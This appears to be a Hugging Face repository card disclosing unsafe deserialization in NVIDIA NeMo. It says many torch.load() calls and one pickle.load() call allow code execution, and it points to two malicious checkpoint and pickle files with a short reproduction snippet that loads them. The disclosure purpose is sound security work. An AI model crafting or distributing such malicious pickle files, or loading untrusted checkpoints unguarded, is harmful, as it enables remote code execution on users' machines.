YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
NVIDIA NeMo β Unsafe Deserialization PoC
Summary
NVIDIA NeMo framework contains 41+ instances of torch.load() without weights_only=True and 1 instance of raw pickle.load(), enabling arbitrary code execution when loading malicious model checkpoints.
Files
malicious_nemo_model.ckptβ Malicious NeMo checkpoint (triggers viatorch.load())malicious_tabular_tokenizer.pklβ Malicious pickle file (triggers viapickle.load())
Reproduction
import torch
# This triggers RCE β as NeMo does in 41+ locations
state = torch.load("malicious_nemo_model.ckpt")
import pickle
# This triggers RCE β as NeMo does in tabular_tokenizer.py:44
with open("malicious_tabular_tokenizer.pkl", "rb") as f:
pickle.load(f)
Impact
Loading a malicious .nemo or .ckpt checkpoint achieves full Remote Code Execution. This affects the entire NeMo framework including TTS, ASR, NLP, and multimodal models.
Affected Version
NeMo v2.2.0+ (commit 530c684e5ceea7a3a73b5e0276e457ef1df489d0)
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support